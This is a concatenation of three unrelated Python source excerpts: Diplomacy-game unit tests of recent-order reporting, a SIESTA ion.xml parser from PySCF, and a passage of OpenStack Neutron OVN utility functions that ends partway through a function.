            actor='brest.l', action='B')
        t = factories.TurnFactory(game=self.game, year=1901, season='S')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='brest.l', previous='')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='piedmont.l', previous='piedmont.l')
        factories.CanonicalOrderFactory(
            turn=t, government=gvt, result='B',
            actor='brest.l', action='M', target='picardy.l')
        factories.CanonicalOrderFactory(
            turn=t, government=gvt, result='S',
            actor='piedmont.l', action='M', target='tuscany.l')
        t = factories.TurnFactory(game=self.game, year=1901, season='SR')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='brest.l', previous='brest.l')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='tuscany.l', previous='piedmont.l')
        factories.CanonicalOrderFactory(
            turn=t, government=gvt, result='S',
            actor='brest.l', action='M', target='paris.l')
        recent = t.recent_orders()
        self.assertEqual(len(recent), 1)
        power, orders = recent[0]
        self.assertEqual(power, gvt.power_display)
        self.assertEqual(len(orders), 2)
        (actor1, orders1), (actor2, orders2) = orders
        self.assertCountEqual([actor1, actor2], ['brest.l', 'piedmont.l'])
        orders = {actor1: orders1, actor2: orders2}
        self.assertEqual([(o.turn.season, o.turn.year) for o in orders['brest.l']],
                         [('S', 1901)])
        self.assertEqual([(o.turn.season, o.turn.year) for o in orders['piedmont.l']],
                         [('S', 1901)])
    def test_recent_orders_fall(self):
        """From a fall turn, each unit reports its spring orders plus any
        spring-retreat order it issued."""
        gvt = models.Government.objects.all()[0]
        t = factories.TurnFactory(game=self.game, year=1900, season='FA')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='piedmont.l', previous='marseilles.l')
        factories.CanonicalOrderFactory(
            turn=t, government=gvt, result='S',
            actor='brest.l', action='B')
        t = factories.TurnFactory(game=self.game, year=1901, season='S')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='brest.l', previous='')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='piedmont.l', previous='piedmont.l')
        factories.CanonicalOrderFactory(
            turn=t, government=gvt, result='B',
            actor='brest.l', action='M', target='picardy.l')
        factories.CanonicalOrderFactory(
            turn=t, government=gvt, result='S',
            actor='piedmont.l', action='M', target='tuscany.l')
        t = factories.TurnFactory(game=self.game, year=1901, season='SR')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='brest.l', previous='brest.l')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='tuscany.l', previous='piedmont.l')
        factories.CanonicalOrderFactory(
            turn=t, government=gvt, result='S',
            actor='brest.l', action='M', target='paris.l')
        t = factories.TurnFactory(game=self.game, year=1901, season='F')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='paris.l', previous='brest.l')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='tuscany.l', previous='tuscany.l')
        factories.CanonicalOrderFactory(
            turn=t, government=gvt, result='S',
            actor='tuscany.l', action='M', target='marseilles.l')
        factories.CanonicalOrderFactory(
            turn=t, government=gvt, result='S',
            actor='paris.l', action='M', target='burgundy.l')
        recent = t.recent_orders()
        self.assertEqual(len(recent), 1)
        power, orders = recent[0]
        self.assertEqual(power, gvt.power_display)
        self.assertEqual(len(orders), 2)
        (actor1, orders1), (actor2, orders2) = orders
        self.assertCountEqual([actor1, actor2], ['brest.l', 'piedmont.l'])
        orders = {actor1: orders1, actor2: orders2}
        self.assertEqual([(o.turn.season, o.turn.year) for o in orders['brest.l']],
                         [('S', 1901), ('SR', 1901)])
        self.assertEqual([(o.turn.season, o.turn.year) for o in orders['piedmont.l']],
                         [('S', 1901)])
    def test_recent_orders_fall_retreat(self):
        """From a fall-retreat turn, only the fall orders (including the
        bounced one that forced the retreat) are reported."""
        gvt = models.Government.objects.all()[0]
        t = factories.TurnFactory(game=self.game, year=1901, season='SR')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='brest.l', previous='brest.l')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='tuscany.l', previous='piedmont.l')
        factories.CanonicalOrderFactory(
            turn=t, government=gvt, result='S',
            actor='brest.l', action='M', target='paris.l')
        t = factories.TurnFactory(game=self.game, year=1901, season='F')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='paris.l', previous='brest.l')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='tuscany.l', previous='tuscany.l')
        factories.CanonicalOrderFactory(
            turn=t, government=gvt, result='B',
            actor='tuscany.l', action='M', target='marseilles.l')
        factories.CanonicalOrderFactory(
            turn=t, government=gvt, result='S',
            actor='paris.l', action='M', target='burgundy.l')
        t = factories.TurnFactory(game=self.game, year=1901, season='FR')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='burgundy.l', previous='paris.l')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='tuscany.l', previous='tuscany.l')
        factories.CanonicalOrderFactory(
            turn=t, government=gvt, result='S',
            actor='tuscany.l', action='M', target='rome.l')
        recent = t.recent_orders()
        self.assertEqual(len(recent), 1)
        power, orders = recent[0]
        self.assertEqual(power, gvt.power_display)
        self.assertEqual(len(orders), 2)
        (actor1, orders1), (actor2, orders2) = orders
        self.assertCountEqual([actor1, actor2], ['paris.l', 'tuscany.l'])
        orders = {actor1: orders1, actor2: orders2}
        self.assertEqual([(o.turn.season, o.turn.year) for o in orders['paris.l']],
                         [('F', 1901)])
        self.assertEqual([(o.turn.season, o.turn.year) for o in orders['tuscany.l']],
                         [('F', 1901)])
    def test_recent_orders_fall_adjustment(self):
        """From a fall-adjustment turn, units report their fall orders plus
        any fall-retreat order issued on the way."""
        gvt = models.Government.objects.all()[0]
        t = factories.TurnFactory(game=self.game, year=1901, season='SR')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='brest.l', previous='brest.l')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='tuscany.l', previous='piedmont.l')
        factories.CanonicalOrderFactory(
            turn=t, government=gvt, result='S',
            actor='brest.l', action='M', target='paris.l')
        t = factories.TurnFactory(game=self.game, year=1901, season='F')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='paris.l', previous='brest.l')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='tuscany.l', previous='tuscany.l')
        factories.CanonicalOrderFactory(
            turn=t, government=gvt, result='B',
            actor='tuscany.l', action='M', target='marseilles.l')
        factories.CanonicalOrderFactory(
            turn=t, government=gvt, result='S',
            actor='paris.l', action='M', target='burgundy.l')
        t = factories.TurnFactory(game=self.game, year=1901, season='FR')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='burgundy.l', previous='paris.l')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='tuscany.l', previous='tuscany.l')
        factories.CanonicalOrderFactory(
            turn=t, government=gvt, result='S',
            actor='tuscany.l', action='M', target='rome.l')
        t = factories.TurnFactory(game=self.game, year=1901, season='FA')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='burgundy.l', previous='burgundy.l')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='rome.l', previous='tuscany.l')
        factories.CanonicalOrderFactory(
            turn=t, government=gvt, result='S',
            actor='marseilles.l', action='B')
        recent = t.recent_orders()
        self.assertEqual(len(recent), 1)
        power, orders = recent[0]
        self.assertEqual(power, gvt.power_display)
        self.assertEqual(len(orders), 2)
        (actor1, orders1), (actor2, orders2) = orders
        self.assertCountEqual([actor1, actor2], ['paris.l', 'tuscany.l'])
        orders = {actor1: orders1, actor2: orders2}
        self.assertEqual([(o.turn.season, o.turn.year) for o in orders['paris.l']],
                         [('F', 1901)])
        self.assertEqual([(o.turn.season, o.turn.year) for o in orders['tuscany.l']],
                         [('F', 1901), ('FR', 1901)])
| |
# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division, print_function
import numpy as np
from xml.dom import minidom
import sys
import re
def str2int(string):
    """Return every numeric token found in *string* as an integer array.

    Raises ValueError if a matched token is not a valid integer literal
    (e.g. contains a decimal point), as the original conversion did.
    """
    numeric_const_pattern = r"""
    [-+]? # optional sign
    (?:
    (?: \d* \. \d+ ) # .1 .12 .123 etc 9.1 etc 98.1 etc
    |
    (?: \d+ \.? ) # 1. 12. 123. etc 1 12 123 etc
    )
    # followed by optional exponent part if desired
    (?: [Ee] [+-]? \d+ ) ?
    """
    pattern = re.compile(numeric_const_pattern, re.VERBOSE)
    return np.array([int(token) for token in pattern.findall(string)])
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!1
def str2float(string):
    """Return every numeric token found in *string* as a float array."""
    numeric_const_pattern = r"""
    [-+]? # optional sign
    (?:
    (?: \d* \. \d+ ) # .1 .12 .123 etc 9.1 etc 98.1 etc
    |
    (?: \d+ \.? ) # 1. 12. 123. etc 1 12 123 etc
    )
    # followed by optional exponent part if desired
    (?: [Ee] [+-]? \d+ ) ?
    """
    pattern = re.compile(numeric_const_pattern, re.VERBOSE)
    return np.array([float(token) for token in pattern.findall(string)])
def siesta_ion_xml(fname):
    """
    Read the ion.xml file of a specie

    Input parameters:
    -----------------
        fname (str): name of the ion file

    Output Parameters:
    ------------------
        ion (dict): The ion dictionary contains all the data
            from the ion file. Each field of the xml file gives
            one key.
            The different keys are:
                'lmax_basis': int
                'self_energy': float
                'z': int
                'symbol': str
                'label': str
                'mass': float
                'lmax_projs': int
                'basis_specs': str
                'norbs_nl': int
                'valence': float
                'nprojs_nl': int
            The following keys give the pao field,
                'npts': list of int
                'delta': list of float
                'cutoff': list of float
                'data': list of np.array of shape (npts[i], 2)
                'orbital': list of dictionary
                'projector': list of dictionary
    """
    doc = minidom.parse(fname)
    # Header elements: (tag name, python type used for the conversion).
    elements_headers = [
        ['symbol', str], ['label', str], ['z', int], ['valence', float],
        ['mass', float], ['self_energy', float], ['lmax_basis', int],
        ['norbs_nl', int], ['lmax_projs', int], ['nprojs_nl', int]]
    ion = {}
    for tag, dtype in elements_headers:
        nodes = doc.getElementsByTagName(tag)
        ion[tag] = get_data_elements(nodes[0], dtype)
    # The basis_specs block is kept verbatim as text.
    nodes = doc.getElementsByTagName("basis_specs")
    ion["basis_specs"] = getNodeText(nodes[0])
    # Optional fields; each maps to the kind of sub-element it contains
    # ('orbital' for paos, 'projector' for kbs, nothing for the others).
    # Missing fields are stored as None.
    field = {'paos': 'orbital', 'kbs': 'projector', 'vna': None,
             'chlocal': None, 'reduced_vlocal': None, 'core': None}
    for k, v in field.items():
        nodes = doc.getElementsByTagName(k)
        if len(nodes) > 0:
            ion[k] = extract_field_elements(nodes[0], field=v)
        else:
            ion[k] = None
    return ion
def getNodeText(node):
    """Concatenate and return the text of all direct TEXT_NODE children."""
    return ''.join(child.data for child in node.childNodes
                   if child.nodeType == child.TEXT_NODE)
def get_data_elements(name, dtype):
    """
    Return the node's text converted to *dtype*.

    For int/float a scalar is returned for a single value and an array
    for several; str returns the raw text. Any other dtype raises.
    """
    if dtype not in (int, float, str):
        raise ValueError('not implemented')
    text = getNodeText(name)
    if dtype is str:
        return text
    data = str2int(text) if dtype is int else str2float(text)
    if len(data) > 1:
        return np.array(data)
    if len(data) == 1:
        return data[0]
    raise ValueError("len(data)<1 ??")
def extract_field_elements(doc, field=None):
    """
    extract the different pao element of the xml file

    Input Parameters:
    -----------------
        doc (minidom node): node of the field (e.g. <paos>, <kbs>, ...)
        field (str or None): name of the sub-elements to extract,
            'orbital', 'projector' or None

    Output Parameters:
    ------------------
        pao (dict): with keys npaos, delta, cutoff, npts, data and,
            when *field* is given, a list of per-orbital/projector dicts.
            Returns None when the node has no delta values or any delta
            is null.
    """
    deltas = doc.getElementsByTagName('delta')
    if len(deltas) < 1:
        return None
    # checks if some of the values are null
    for delt in deltas:
        if get_data_elements(delt, float) == 0.0:
            return None
    # if all(delta) > 0.0 then fill the dict
    pao = {}
    pao['npaos'] = len(deltas)
    if pao['npaos'] != len(doc.getElementsByTagName('cutoff')) or\
        pao['npaos'] != len(doc.getElementsByTagName('npts')):
        # typo fix: was 'Error reqding ion file! ...'
        raise ValueError('Error reading ion file! npaos is not constant??')
    pao['delta'] = np.zeros((pao['npaos']), dtype=float)
    pao['cutoff'] = np.zeros((pao['npaos']), dtype=float)
    pao['npts'] = np.zeros((pao['npaos']), dtype=int)
    pao['data'] = []
    for i, delt in enumerate(deltas):
        pao['delta'][i] = get_data_elements(delt, float)
    for i, cut in enumerate(doc.getElementsByTagName('cutoff')):
        pao['cutoff'][i] = get_data_elements(cut, float)
    for i, npt in enumerate(doc.getElementsByTagName('npts')):
        pao['npts'][i] = get_data_elements(npt, int)
    for i, dat in enumerate(doc.getElementsByTagName('data')):
        pao['data'].append(get_data_elements(dat, float).reshape(pao["npts"][i], 2))
    if len(pao['data']) != pao['npaos']:
        raise ValueError('Error reading ion file, len(data) != npaos')
    if field is not None:
        name_orbital = doc.getElementsByTagName(field)
        pao[field] = []
        if field == 'orbital':
            for i in range(len(name_orbital)):
                pao[field].append(extract_orbital(name_orbital[i]))
        elif field == 'projector':
            for i in range(len(name_orbital)):
                pao[field].append(extract_projector(name_orbital[i]))
        else:
            # typo fix: was 'onlt orbital or projector!!'
            raise ValueError(field + ' not implemented, only orbital or projector!!')
        if len(pao[field]) != pao['npaos']:
            raise ValueError('Error reading ion file, len(' + field + ') != npaos')
    return pao
def extract_orbital(orb_xml):
    """Return a dict of the orbital attributes (l, n, z, ispol, population)."""
    attrs = orb_xml.attributes
    orb = {key: int(attrs[key].value) for key in ('l', 'n', 'z', 'ispol')}
    orb['population'] = float(attrs['population'].value)
    return orb
def extract_projector(pro_xml):
    """Return a dict of the projector attributes (l, n, ref_energy)."""
    attrs = pro_xml.attributes
    return {'l': int(attrs['l'].value),
            'n': int(attrs['n'].value),
            'ref_energy': float(attrs['ref_energy'].value)}
#
# Executable part
#
if __name__ == "__main__":
    # Give a clear usage error instead of an IndexError when the ion file
    # name is missing from the command line (sys is already imported at
    # module level; the redundant local import was removed).
    if len(sys.argv) < 2:
        sys.exit("usage: %s <ion.xml file>" % sys.argv[0])
    fname = sys.argv[1]
    ionxml = siesta_ion_xml(fname)
    print(dir(ionxml))
| |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import copy
import inspect
import os
import re
import netaddr
from neutron_lib.api.definitions import external_net
from neutron_lib.api.definitions import extra_dhcp_opt as edo_ext
from neutron_lib.api.definitions import l3
from neutron_lib.api.definitions import port_security as psec
from neutron_lib.api.definitions import portbindings
from neutron_lib.api import validators
from neutron_lib import constants as const
from neutron_lib import context as n_context
from neutron_lib import exceptions as n_exc
from neutron_lib.plugins import directory
from neutron_lib.utils import net as n_utils
from oslo_config import cfg
from oslo_log import log
from oslo_serialization import jsonutils
from oslo_utils import netutils
from oslo_utils import strutils
from ovsdbapp import constants as ovsdbapp_const
from neutron._i18n import _
from neutron.common.ovn import constants
from neutron.common.ovn import exceptions as ovn_exc
from neutron.common import utils as common_utils
from neutron.conf.plugins.ml2.drivers.ovn import ovn_conf
from neutron.db import models_v2
from neutron.objects import ports as ports_obj
LOG = log.getLogger(__name__)
CONF = cfg.CONF
# System resolver configuration, used as a fallback source of DNS servers.
DNS_RESOLVER_FILE = "/etc/resolv.conf"
# Result of diffing two allowed_address_pairs lists.
AddrPairsDiff = collections.namedtuple(
    'AddrPairsDiff', ['added', 'removed', 'changed'])
# Result of validating a port's extra DHCP options.
PortExtraDHCPValidation = collections.namedtuple(
    'PortExtraDHCPValidation', ['failed', 'invalid_ipv4', 'invalid_ipv6'])
def ovn_name(id):
    """Return the OVN entry name for a Neutron UUID: neutron-<UUID>.

    OVN checks whether a name is a bare UUID (which would collide with
    its own identifiers), so the Neutron UUID is prefixed; this also
    lets us recover the Neutron UUID when updating or deleting.
    """
    return '{}{}'.format(constants.OVN_NAME_PREFIX, id)
def ovn_lrouter_port_name(id):
    """Return the OVN logical router port name: lrp-<UUID>.

    The lrp- prefix distinguishes it from the connected lswitch patch
    port (which is named with the neutron port uuid), so the OVS patch
    ports pair up as patch-lrp-<UUID>-to-<UUID> and
    patch-<UUID>-to-lrp-<UUID>.
    """
    return '%s%s' % (constants.LRP_PREFIX, id)
def ovn_cr_lrouter_port_name(_id):
    """Return the OVN chassisredirect lrouter port name: cr-lrp-<UUID>."""
    return 'cr-lrp-{}'.format(_id)
def ovn_provnet_port_name(network_id):
    """Return the OVN lswitch provider network port name.

    Format is provnet-<Network-UUID>; the port is created for networks
    carrying a provider:physical_network attribute.
    """
    return '%s%s' % (constants.OVN_PROVNET_PORT_NAME_PREFIX, network_id)
def ovn_vhu_sockpath(sock_dir, port_id):
    """Return the vhost-user socket path for *port_id* under *sock_dir*.

    The basename becomes the virtio port name, which must fit within
    IFNAMSIZ(16), so it is truncated to 14 characters.
    """
    basename = (const.VHOST_USER_DEVICE_PREFIX + port_id)[:14]
    return os.path.join(sock_dir, basename)
def ovn_addrset_name(sg_id, ip_version):
    """Return the address set name for a security group and IP version.

    Format: as-<ip version>-<security group uuid>, with every '-'
    replaced by '_' because OVN does not allow '-' in address set names.
    """
    return 'as-{}-{}'.format(ip_version, sg_id).replace('-', '_')
def ovn_pg_addrset_name(sg_id, ip_version):
    """Return the address set name for a security group modelled as a
    Port Group, for the given IP version.

    Format: pg-<security group uuid>-<ip version>, with every '-'
    replaced by '_' because OVN does not allow '-' in address set names.
    """
    return 'pg-{}-{}'.format(sg_id, ip_version).replace('-', '_')
def ovn_port_group_name(sg_id):
    """Return the port group name for a security group: pg-<uuid>,
    with '-' replaced by '_'."""
    return 'pg-{}'.format(sg_id).replace('-', '_')
def is_network_device_port(port):
    """True when the port's device_owner marks it as a network device."""
    device_owner = port.get('device_owner', '')
    return device_owner.startswith(const.DEVICE_OWNER_PREFIXES)
def _is_dhcp_disabled(dhcp_opt):
    """True when this extra-DHCP option disables DHCP for the port."""
    if dhcp_opt['opt_name'] != constants.DHCP_DISABLED_OPT:
        return False
    return dhcp_opt.get('opt_value', '').lower() == 'true'
def validate_port_extra_dhcp_opts(port):
    """Validate port's extra DHCP options.

    A special "DHCP disabled" option set to true short-circuits the
    validation: the port will not use OVN native DHCP at all, so any
    other (even invalid) options are irrelevant.

    :param port: A neutron port.
    :returns: A PortExtraDHCPValidation object; ``failed`` is True when
        at least one option is unsupported for its IP version, and the
        invalid_ipv4/invalid_ipv6 lists then name the offending options.
    """
    invalid = {const.IP_VERSION_4: [], const.IP_VERSION_6: []}
    failed = False
    for edo in port.get(edo_ext.EXTRADHCPOPTS, []):
        ip_version = edo['ip_version']
        opt_name = edo['opt_name']
        # If DHCP is disabled for this port via this special option,
        # always succeed the validation
        if _is_dhcp_disabled(edo):
            failed = False
            break
        if opt_name not in constants.SUPPORTED_DHCP_OPTS_MAPPING[ip_version]:
            invalid[ip_version].append(opt_name)
            failed = True
    return PortExtraDHCPValidation(
        failed=failed,
        invalid_ipv4=invalid[const.IP_VERSION_4] if failed else [],
        invalid_ipv6=invalid[const.IP_VERSION_6] if failed else [])
def get_lsp_dhcp_opts(port, ip_version):
    """Assemble the OVN DHCP_Options mapping for a Neutron port.

    :param port: A neutron port dict.
    :param ip_version: 4 or 6; only extra DHCP options of this version
        are considered.
    :returns: tuple (lsp_dhcp_disabled, lsp_dhcp_opts). The flag is True
        when OVN native DHCP must not be configured for this port
        (network-device ports, or an explicit "disable" option); the dict
        maps OVN option names to the values from the port.
    """
    # Get dhcp options from Neutron port, for setting DHCP_Options row
    # in OVN.
    lsp_dhcp_disabled = False
    lsp_dhcp_opts = {}
    if is_network_device_port(port):
        lsp_dhcp_disabled = True
    else:
        mapping = constants.SUPPORTED_DHCP_OPTS_MAPPING[ip_version]
        for edo in port.get(edo_ext.EXTRADHCPOPTS, []):
            if edo['ip_version'] != ip_version:
                continue
            if _is_dhcp_disabled(edo):
                # OVN native DHCP is disabled on this port
                lsp_dhcp_disabled = True
                # Make sure return value behavior not depends on the order and
                # content of the extra DHCP options for the port
                lsp_dhcp_opts.clear()
                break
            if edo['opt_name'] not in mapping:
                LOG.warning('The DHCP option %(opt_name)s on port %(port)s '
                            'is not suppported by OVN, ignoring it',
                            {'opt_name': edo['opt_name'], 'port': port['id']})
                continue
            opt = mapping[edo['opt_name']]
            lsp_dhcp_opts[opt] = edo['opt_value']
    return (lsp_dhcp_disabled, lsp_dhcp_opts)
def is_lsp_trusted(port):
    """True when the port has a device_owner and neutron deems it trusted."""
    return bool(port.get('device_owner')) and n_utils.is_port_trusted(port)
def is_lsp_ignored(port):
    """True for ports that must not be created/updated in OVN.

    Floating IP ports are not bound to any chassis, so packets from a VM
    destined to the floating IP would be dropped; we therefore skip them.
    """
    return port.get('device_owner') == const.DEVICE_OWNER_FLOATINGIP
def get_lsp_security_groups(port, skip_trusted_port=True):
    """Return the port's security groups, skipping trusted ports.

    In agents like OVS, trusted ports are filtered in the security
    groups RPC; we have no such step, so it is done here.
    """
    if skip_trusted_port and is_lsp_trusted(port):
        return []
    return port.get('security_groups', [])
def is_snat_enabled(router):
    """True when SNAT is enabled on the router's external gateway."""
    gw_info = router.get(l3.EXTERNAL_GW_INFO, {})
    return gw_info.get('enable_snat', True)
def is_port_security_enabled(port):
    """Return the port's port_security flag (None when unset)."""
    return port.get(psec.PORTSECURITY)
def is_security_groups_enabled(port):
    """Return the port's security-groups flag (None when unset)."""
    return port.get(constants.PORT_SECURITYGROUPS)
def validate_and_get_data_from_binding_profile(port):
    """Validate the port's binding:profile and return its parameters.

    The profile is matched against the parameter sets registered in
    constants.OVN_PORT_BINDING_PROFILE_PARAMS (selected by the port's
    VNIC type and capabilities); required keys, value types, and the
    special 'parent_name' and 'tag' entries are validated.

    :param port: A neutron port dict.
    :returns: dict of validated binding-profile parameters, or {} when no
        (matching) profile data is present.
    :raises n_exc.InvalidInput: when the profile is malformed.
    """
    if (constants.OVN_PORT_BINDING_PROFILE not in port or
            not validators.is_attr_set(
                port[constants.OVN_PORT_BINDING_PROFILE])):
        return {}
    param_set = {}
    param_dict = {}
    vnic_type = port.get(portbindings.VNIC_TYPE, portbindings.VNIC_NORMAL)
    # A port's capabilities is listed as part of the binding profile, but we
    # treat it separately and do not want it to be included in the generic
    # validation.
    binding_profile = copy.deepcopy(port[constants.OVN_PORT_BINDING_PROFILE])
    capabilities = binding_profile.pop(constants.PORT_CAP_PARAM, [])
    if not isinstance(capabilities, list):
        msg = _('Invalid binding:profile. %s must be of type list.'
                ) % constants.PORT_CAP_PARAM
        raise n_exc.InvalidInput(error_message=msg)
    # Find the first parameter set matching the port's VNIC type and
    # capabilities, then require all (and only) its keys to be present.
    for pbp_param_set in constants.OVN_PORT_BINDING_PROFILE_PARAMS:
        if pbp_param_set.vnic_type:
            if pbp_param_set.vnic_type != vnic_type:
                continue
            if capabilities and pbp_param_set.capability not in capabilities:
                continue
        param_set = pbp_param_set.param_set
        param_keys = param_set.keys()
        for param_key in param_keys:
            try:
                param_dict[param_key] = binding_profile[param_key]
            except KeyError:
                pass
        if len(param_dict) == 0:
            continue
        if len(param_dict) != len(param_keys):
            msg = _('Invalid binding:profile. %s are all '
                    'required.') % param_keys
            raise n_exc.InvalidInput(error_message=msg)
        if (len(binding_profile) != len(param_keys)):
            msg = _('Invalid binding:profile. too many parameters')
            raise n_exc.InvalidInput(error_message=msg)
        break
    if not param_dict:
        return {}
    # With this example param_set:
    #
    # param_set = {
    #     'do_not_check_this_key': None,
    #     'pci_slot': [str],
    #     'physical_network': [str, type(None)]
    # }
    #
    # We confirm that each binding_profile key is of one of the listed types,
    # allowing validation of polymorphic entries.
    #
    # 'physical_network' is polymorphic because: When a VNIC_REMOTE_MANAGED or
    # VNIC_DIRECT with PORT_CAP_SWITCHDEV capability port is attached to a
    # project network backed by an overlay (tunneled) network the value will be
    # 'None'. For the case of ports attached to a project network backed by
    # VLAN the value will be of type ``str``. This comes from Nova and is
    # provided in the ``physical_network`` tag in the Nova PCI Passthrough
    # configuration.
    #
    # In the above example the type of the value behind 'do_not_check_this_key'
    # will not be checked, 'pci_slot' must be ``str``, 'physical_network must
    # be either ``str`` or ``NoneType``.
    for param_key, param_types in param_set.items():
        if param_types is None:
            continue
        param_value = param_dict[param_key]
        for param_type in param_types:
            if isinstance(param_value, param_type):
                break
        else:
            msg = _('Invalid binding:profile. %(key)s %(value)s '
                    'value invalid type') % {'key': param_key,
                                             'value': param_value}
            raise n_exc.InvalidInput(error_message=msg)
    # Make sure we can successfully look up the port indicated by
    # parent_name. Just let it raise the right exception if there is a
    # problem.
    if 'parent_name' in param_set:
        plugin = directory.get_plugin()
        plugin.get_port(n_context.get_admin_context(),
                        param_dict['parent_name'])
    if 'tag' in param_set:
        tag = int(param_dict['tag'])
        if tag < 0 or tag > 4095:
            msg = _('Invalid binding:profile. tag "%s" must be '
                    'an integer between 0 and 4095, inclusive') % tag
            raise n_exc.InvalidInput(error_message=msg)
    return param_dict
def is_dhcp_options_ignored(subnet):
    """True for subnets that must not get a DHCP_Options entry.

    DHCPv6 does not apply to IPv6 subnets in SLAAC address mode.
    """
    if subnet['ip_version'] != const.IP_VERSION_6:
        return False
    return subnet.get('ipv6_address_mode') == const.IPV6_SLAAC
def get_ovn_ipv6_address_mode(address_mode):
    """Map a Neutron ipv6_address_mode to the OVN equivalent."""
    return constants.OVN_IPV6_ADDRESS_MODES[address_mode]
def get_revision_number(resource, resource_type):
    """Get the resource's revision number based on its type."""
    supported_types = (constants.TYPE_NETWORKS,
                       constants.TYPE_PORTS,
                       constants.TYPE_SECURITY_GROUP_RULES,
                       constants.TYPE_ROUTERS,
                       constants.TYPE_ROUTER_PORTS,
                       constants.TYPE_SECURITY_GROUPS,
                       constants.TYPE_FLOATINGIPS, constants.TYPE_SUBNETS)
    if resource_type not in supported_types:
        raise ovn_exc.UnknownResourceType(resource_type=resource_type)
    return resource['revision_number']
def remove_macs_from_lsp_addresses(addresses):
    """Remove the mac addreses from the Logical_Switch_Port addresses column.

    :param addresses: The list of addresses from the Logical_Switch_Port.
        Example: ["80:fa:5b:06:72:b7 158.36.44.22",
                  "ff:ff:ff:ff:ff:ff 10.0.0.2"]
    :returns: A list of IP addesses (v4 and v6)
    """
    ip_list = []
    for addr in addresses:
        for token in addr.split():
            if netutils.is_valid_ipv4(token) or netutils.is_valid_ipv6(token):
                ip_list.append(token)
    return ip_list
def get_allowed_address_pairs_ip_addresses(port):
    """Return a list of IP addresses from port's allowed_address_pairs.

    :param port: A neutron port
    :returns: A list of IP addesses (v4 and v6)
    """
    pairs = port.get('allowed_address_pairs', [])
    return [pair['ip_address'] for pair in pairs if 'ip_address' in pair]
def get_allowed_address_pairs_ip_addresses_from_ovn_port(ovn_port):
    """Return a list of IP addresses from ovn port.

    Reconstructs the equivalent of Neutron's allowed_address_pairs IPs:
    IPs present in the port_security column but not in addresses.

    :param ovn_port: A OVN port
    :returns: A list of IP addesses (v4 and v6)
    """
    known_ips = remove_macs_from_lsp_addresses(ovn_port.addresses)
    port_security_ips = remove_macs_from_lsp_addresses(ovn_port.port_security)
    return [ip for ip in port_security_ips if ip not in known_ips]
def get_ovn_port_security_groups(ovn_port, skip_trusted_port=True):
    """Return the security group ids stored in an OVN port's external_ids."""
    external_ids = ovn_port.external_ids
    info = {
        'security_groups': external_ids.get(
            constants.OVN_SG_IDS_EXT_ID_KEY, '').split(),
        'device_owner': external_ids.get(
            constants.OVN_DEVICE_OWNER_EXT_ID_KEY, ''),
    }
    return get_lsp_security_groups(info, skip_trusted_port=skip_trusted_port)
def get_ovn_port_addresses(ovn_port):
    """Return the deduplicated union of an OVN port's addresses and
    port_security IPs (order unspecified, as before)."""
    ips = set(remove_macs_from_lsp_addresses(ovn_port.addresses))
    ips.update(remove_macs_from_lsp_addresses(ovn_port.port_security))
    return list(ips)
def sort_ips_by_version(addresses):
    """Split *addresses* into {'ip4': [...], 'ip6': [...]} buckets."""
    ip_map = {'ip4': [], 'ip6': []}
    for address in addresses:
        version = netaddr.IPNetwork(address).version
        ip_map['ip%d' % version].append(address)
    return ip_map
def is_lsp_router_port(port):
    """True when the port's device_owner marks it as a router port."""
    return port.get('device_owner') in const.ROUTER_PORT_OWNERS
def get_lrouter_ext_gw_static_route(ovn_router):
    """Return the router's static routes flagged as external-gateway routes."""
    ext_gw_routes = []
    for route in getattr(ovn_router, 'static_routes', []):
        external_ids = getattr(route, 'external_ids', {})
        if strutils.bool_from_string(
                external_ids.get(constants.OVN_ROUTER_IS_EXT_GW, 'false')):
            ext_gw_routes.append(route)
    return ext_gw_routes
def get_lrouter_snats(ovn_router):
    """Return the NAT rules of type 'snat' on the logical router."""
    nat_rules = getattr(ovn_router, 'nat', [])
    return [rule for rule in nat_rules if rule.type == 'snat']
def get_lrouter_non_gw_routes(ovn_router):
    """Return the non-gateway static routes as destination/nexthop dicts."""
